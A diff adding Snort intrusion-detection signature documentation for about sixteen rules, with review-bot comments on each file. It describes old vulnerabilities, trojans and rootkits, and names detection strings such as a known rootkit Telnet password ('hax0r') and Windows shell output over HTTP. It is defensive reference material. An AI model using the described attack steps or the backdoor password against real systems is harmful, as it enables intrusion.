+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "New Category" parameter in the "edtalbum.asp" 
+script used by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
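Review bot: Impact overstates the issue: for a cross site scripting bug in "edtalbum.asp", "system integrity compromise", "administrative access to the server" and server-side "execution of arbitrary code" are not what Attack Scenarios describes ("a malicious link designed to steal information from a user clicking on that link"); rewrite Impact in terms of script execution in the victim's browser and session or credential theft. The parameter is given as "New Category" with a space; confirm the actual form field name used by the rule.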
--- /dev/null
+++ b/doc/signatures/1728.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1728
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in the ftp server included with version 2.6 of the Sun Solaris operating system.
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+An error in the ftp daemon supplied with version 2.6 of Sun's Solaris operating system can cause the daemon to overflow a buffer and generate a core file that is world readable.
+
+The attacker may also be able to fill the disk partition by generating core files.
+
+--
+Affected Systems:
+Sun Solaris 2.6
+
+--
+Attack Scenarios:
+An attacker can use a non-standard ftp client or initiate a session with the ftp server and issue a CWD ~ command. The attacker may then be able to read the core file and recover usernames and passwords for other users on the system
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
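Review bot: Impact is just "Serious." and says nothing about what is exposed; Detailed Information and Attack Scenarios do ("a core file that is world readable", "recover usernames and passwords for other users"), so state the information disclosure and the disk-filling denial of service in Impact. False Positives "None Known" is doubtful: "CWD ~" is also what an ordinary FTP client sends when a logged-in user changes to their home directory, so legitimate sessions on patched servers will match; note that and suggest restricting the rule to external sources or to Solaris 2.6 hosts. The Attack Scenarios sentence has no closing period, and Additional References is empty even though Corrective Action tells the reader to apply "the appropriate vendor supplied patches"; cite that patch.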
--- /dev/null
+++ b/doc/signatures/494.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 494
+
+-- 
+Summary:
+This event is generated by a successful attempt to execute a command. This may be indicative of post-compromise behavior indicating the use of a Windows command shell.
+
+-- 
+
+Impact:
+Serious. An attacker may have the ability to execute commands remotely
+
+--
+Detailed Information:
+This event is generated by an unsuccessful attempt to execute a Windows command which generates the response "The command completed successfully". For example, it is generated in Windows 2000/XP after the "net" command (such as "net use") is used. The net commands are used for a wide variety of system tasks of interest to attackers and can be started from the windows shell (cmd.exe, command.com). 
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has sucessfully executed a command. Note that the source address of this event is actually the victim and not that of the attacker.
+
+--
+
+Attack Scenarios:
+An attacker gains an access to a Windows web server via IIS vulnerability and manages to start a cmd.exe shell. He then proceeds to map the DMZ network via "net use" commands.
+
+-- 
+
+Ease of Attack:
+Simple. This post-attack behavior can accompany different attacks.
+
+-- 
+
+False Positives:
+This rule will generate an event if the string "Command completed" appears in the content distributed by the web server, in which case the rule should be tuned.
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Investigate the web server for signs of compromise.
+
+Look for other IDS events involving the same IP addresses.
+
+--
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft Technet:
+http://www.microsoft.com/technet/prodtechnol/windows2000serv/support/FAQW2KCP.asp
+
+--
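Review bot: Summary and Detailed Information contradict each other. Summary says "a successful attempt to execute a command"; Detailed Information says "an unsuccessful attempt to execute a Windows command which generates the response "The command completed successfully"". A command that prints that response succeeded, so "unsuccessful" is a mistake; change it to "successful". False Positives then quotes the matched string as "Command completed" while Detailed Information gives "The command completed successfully"; use one wording that matches the rule's content option. Also the "Contributors:" header is missing before "Original rule writer unknown", there is no Affected Systems section ("Windows 2000/XP" from Detailed Information would fit), and "sucessfully" is misspelled.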
--- /dev/null
+++ b/doc/signatures/570.txt
@@ -0,0 +1,71 @@
+SID:
+570
+--
+
+Rule:
+--
+
+Summary:
+This event indicates an attempt to exploit the tool talk RPC database 
+service
+--
+
+Impact:
+Possible unauthorized administrative access to the server or application
+or a denial of service to the affected application
+--
+
+Detailed Information:
+ToolTalk RPC database service (rpc.ttdbserverd) does not perform 
+adequate input validation or provide a format string specifier argument 
+when writing to syslog. This means a specifically crafted RPC request to
+the ToolTalk RPC database service overwriting specific locations in 
+memory and therefore allowing execution of code with the same permission
+level as the user running ttdbserverd, usually root.
+--
+
+Affected Systems:
+	HP-UX 10.10 - 11.0
+	AIX 4.1 - 4.3
+	IRIX 5.2 - 6.4
+	Solaris 1.1 - 2.6
+	TriTeal TED CDE 4.3
+	Xi Graphics Maximum CDE 1.2.3
+	
+Possibly other vendors, if you are running Tool Talk (rpc.ttdbserverd) check with your vendor.
+--
+
+Attack Scenarios:
+An attacker will send a specially crafted RPC call to the 
+rpc.ttdbserverd daemon running on an affected system. A sucessful 
+attack will then run code on the server with the access level of the 
+root user.
+--
+
+Ease of Attack:
+Simple, Exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Updates packages and patches are available from vendors, install them or
+disable the service if not needed.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
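Review bot: the Detailed Information paragraph is a sentence fragment: "This means a specifically crafted RPC request ... overwriting specific locations in memory and therefore allowing execution of code" has no main verb; rewrite as "This means a specially crafted RPC request ... can overwrite specific locations in memory, allowing execution of code". The same paragraph describes two distinct defects, missing "input validation" (a buffer overflow) and a missing "format string specifier argument when writing to syslog" (a format string bug); the file should say which one sid 570 matches, because the affected-version list and the "Exploit code is available" statement may apply to only one of them. Layout differs from the other files: "SID:" comes before "Rule:", and the last section is "References:" rather than "Additional References:" (and is empty). Typos: "tool talk" (ToolTalk), "sucessful", "Updates packages" (Updated packages).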
--- /dev/null
+++ b/doc/signatures/3255.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3255
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
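Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not obviously match Detailed Information ("malformed data via RPC" to "an RPC port"); say explicitly that the long name is carried inside the DCOM request over RPC, or readers will look for file-share traffic instead of traffic to the RPC ports named under Corrective Action. Additional References is empty for a vulnerability whose fix is "the appropriate vendor supplied patches"; cite the vendor bulletin. Typo: "Expoit code exists."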
--- /dev/null
+++ b/doc/signatures/1974.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1974
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with CesarFTPD FTP server REST command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists with the REST command that can cause a buffer overflow and permit the execution of arbitrary commands with system privileges. The buffer overflow can be caused by supplying an overly long argument to the REST command.
+
+--
+Affected Systems:
+Hosts running CesarFTP 0.98b.
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the REST command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0826
+
+--
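Review bot: Attack Scenarios says "an overly long file argument with the REST command", but the argument of the FTP REST command is a restart marker (a byte offset), not a file name; Detailed Information has it right ("an overly long argument to the REST command"), so align the wording. Product naming is inconsistent: "CesarFTPD" in Summary and Detailed Information versus "CesarFTP 0.98b" in Affected Systems. "CesarFTPD offers FTP servers for Windows hosts" reads awkwardly; "CesarFTP is an FTP server for Windows hosts" is clearer. The Summary line and the Brian Caswell contributor line carry trailing whitespace.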
--- /dev/null
+++ b/doc/signatures/157.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+152, 157-158
+
+--
+Summary:
+Backdoor.Backconstruction is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Backconstruction
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+	SID	Message
+	---	-------
+	152	BackConstruction 2.1 Connection (outgoing TCP
+connection)
+	157	BackConstruction 2.1 Client FTP Open Request (incoming
+TCP connection)
+	158	BackConstruction 2.1 Server FTP Open Reply (outging TCP
+connection)
+
+This Trojan is commonly used to install other Trojan programs.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Shell = "<drive>:\WINDOWS\Cmctl32.exe"
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Cmctl32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS505
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/backc/21/index.shtml
+
+Pest Patrol:
+www.pestpatrol.com/PestInfo/b/back_construction.asp
+
+--
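Review bot: the Trojan server path ("The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe") sits under Ease of Attack, where it does not belong; move it to Detailed Information next to the registry change, since Corrective Action depends on both. The Sid header lists "152, 157-158" and the SID/Message table covers all three rules, but the file is named 157.txt; say in the file that it documents three rules, or split it as the other files do. Typos: "sever" (server), "outging" (outgoing). The table rows are wrapped mid-cell ("(outgoing TCP" / "connection)"), which breaks the tab-aligned layout. The Pest Patrol link lacks the http:// scheme the other two references have.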
--- /dev/null
+++ b/doc/signatures/932.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+932
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
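Review bot: the file never says what sid 932 actually matches. Summary, Detailed Information and Attack Scenarios are generic ("Many known vulnerabilities exist for this platform and the attack scenarios are legion"), and Additional References is empty, so a reader cannot tell which ColdFusion component or request the rule keys on or how to tune it. Add the specific file or parameter to Detailed Information and at least one reference. Also "Coldfusion" and "ColdFusion" are both used, and "attackers choosing" should be "attacker's choosing".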
--- /dev/null
+++ b/doc/signatures/1349.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1349
+
+--
+Summary:
+Attempted /bin/python access via web
+
+--
+Impact:
+Attempt to execute a python script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a python script on a host. Python is a scripting language that is available on a wide variety of platforms. By default Python code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to Python in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Python may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all python scripts on the host should be written using the restriceted access mode. This forces Python to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1350
+
+--
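Review bot: Corrective Action recommends writing Python scripts "using the restriceted access mode" so they run in a "sandbox"; besides the typo (restricted), this advice should be checked before it ships: the restricted-execution facility in Python (the rexec and Bastion modules) was disabled in Python 2.3 because it could not be made safe, so current interpreters offer no such mode. Keep the first sentence's advice instead (the interpreter and scripts outside the web root and cgi-bin, and a web server account with minimal permissions). Also "outside of it's designated web root" should be "its", the Detailed Information paragraph lacks a closing period, and there is no Affected Systems section.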
--- /dev/null
+++ b/doc/signatures/1454.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1454
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server, in this case
+the wwwwais cgi application.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Securiteam:
+http://www.securiteam.com/unixfocus/5SP140035A.html
+
+--
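Review bot: Detailed Information and Attack Scenarios are the generic CGI text ("do not perform stringent checks when validating the credentials of a client host") and say nothing about wwwwais, even though Summary names it and a Securiteam advisory is cited; describe the wwwwais-specific defect (which input it mishandles and what the rule keys on) so that the Impact claim "Possible execution of arbitrary code" is justified and the Securiteam link can be checked against it. Typos: "ona web server" (on a), "attackers choosing" (attacker's).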
--- /dev/null
+++ b/doc/signatures/501.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+501
+
+--
+Summary:
+This event is generated when a packet is discovered with loose source routing set in the IP options.
+
+--
+Impact:
+Loose source routing permits the dictation of a route to and from the destination rather than relying on standard dynamic routing.
+
+--
+Detailed Information:
+Loose source routing instructs the packet to traverse identified routers in transit to and from the desired destination.  Normal routing sends a packet one hop at a time allowing each interim router to determine the next hop.  This may permit an attacker to spoof a source IP yet receive the response by sniffing from a network associated with an identified loose source router.  A vulnerability exist in Windows 95, 98, and NT hosts that permits a vulernable destination host to accept a specially crafted source routed packet even though the host has a registry setting to drop it.
+
+--
+Affected Systems:
+Unless loose source routing is disabled, all hosts can accept them.
+
+--
+Attack Scenarios:
+An attacker can craft a special source routed packet to cause Windows 95, 98, and NT hosts to accept them even though a registry setting exists to drop source routed packets.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+This even will trigger if you allow loose source routed packets into your network.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block all source routed (loose or strict) packets from entering your network.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/646
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0909
+
+Whitehats
+www.whitehats.com/info/IDS470
+
+--
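Review bot: the Impact section only defines what loose source routing does; the actual impact is in Detailed Information ("permit an attacker to spoof a source IP yet receive the response by sniffing"), so that sentence belongs under Impact. Typos: "A vulnerability exist" (exists), "vulernable" (vulnerable), "This even will trigger" (event). Affected Systems "Unless loose source routing is disabled, all hosts can accept them" mixes singular and plural; "all hosts accept such packets" reads better.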
--- /dev/null
+++ b/doc/signatures/2921.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2921
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using UDP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+UDP this can result in the attacker causing a stack overflow in named.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
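Review bot: Summary says the event is "an inverse query attempt ... using UDP", but Detailed Information only speaks of "malformed transactions"; state that the defect is in inverse query handling so the two sections agree and the reader can judge the "Moderate" Ease of Attack rating. Additional References is empty; add the vendor advisory that "Apply the appropriate vendor supplied patches" refers to. "Bind 8" should be "BIND 8", and the layout has a stray blank line after "--" before Impact and two blank lines after Contributors.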
--- /dev/null
+++ b/doc/signatures/217.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+217
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "hax0r". This is a known password for 
+the sm4ck Linux rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
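Review bot: "This Trojan affects Linux operating systems:" ends with a colon and nothing follows; either drop the colon or list the systems. Summary calls it the "sm4ck Linux rootkit" while the rest of the file calls it a Trojan; use one term. False Positives "None Known" is optimistic for a rule that matches the string "hax0r" in a Telnet session: any login attempt or session content containing that string will fire, regardless of whether the rootkit is installed; say so and advise examining the login that follows. "when  an" has a double space, and "Use SSH as opposed to Telnet for access from external locations" lacks a period.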
--- /dev/null
+++ b/doc/signatures/1733.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1733
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rwalld is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rwalld is using.  Attackers can also learn what versions of the rwalld protocol are accepted by rwalld. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rwalld run.  The rwalld RPC service is used by UNIX hosts to send a message to current users on the host.  There is a format string vulnerability associated with rwalld error messages, allowing an attacker to execute abitrary code with the privileges of rwalld, possibly root. According to CERT, this is both a local and remote exploit, but the remote exploit is more difficult to perform.
+
+--
+Affected Systems:
+Sun Solaris 2.5.1, 2.6, 7, and 8
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rwalld runs.  This may be a precursor to an attack to exploit the rwalld format string vulnerability.
+
+--
+Ease of Attack:
+Easy.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rwalld, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rwalld, not probes of the rwalld service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rwalld service itself. An attacker may attempt to go directly to the rwalld port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-10.html
+
+
+--
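Review bot: "abitrary" in Detailed Information should be "arbitrary", and "Ease of Attack: Easy." uses "Easy" where the other files use "Simple". Otherwise the False Negatives text is the model the other files should follow: it states exactly what the rule does and does not see (portmapper GETPORT probes, not traffic to the rwalld port itself). There are stray extra blank lines after Summary and after the CERT link.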
--- /dev/null
+++ b/doc/signatures/357.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+357
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
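Review bot: the file does not say what the rule matches: "activity relating to spurious ftp traffic" is not a detection criterion, and Detailed Information offers two unrelated possibilities ("a transfer of a known protected file" or "overflowing a buffer in the FTP daemon or service"). Name the command, filename or pattern sid 357 keys on; without it the "None Known" False Positives entry cannot be evaluated and the Impact range ("information gathering to a serious compromise") cannot be narrowed. Corrective Action "Use secure shell (ssh) to transfer files" should name scp or sftp, and there is no Affected Systems section.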
--- /dev/null
+++ b/doc/signatures/1474.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1474
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
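Review bot: this file is the generic CGI text word for word (Summary "a known vulnerability in a CGI web application running on a server", Detailed Information "do not perform stringent checks when validating the credentials"), with no application name, an empty Additional References section, and Affected Systems "All systems running CGI applications"; a reader cannot tell what sid 1474 detects or whether a match matters for their hosts. Add the application and request the rule keys on, and a reference. Typos: "ona web server", "attackers choosing".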
--- /dev/null
+++ b/doc/signatures/1391.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1391
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
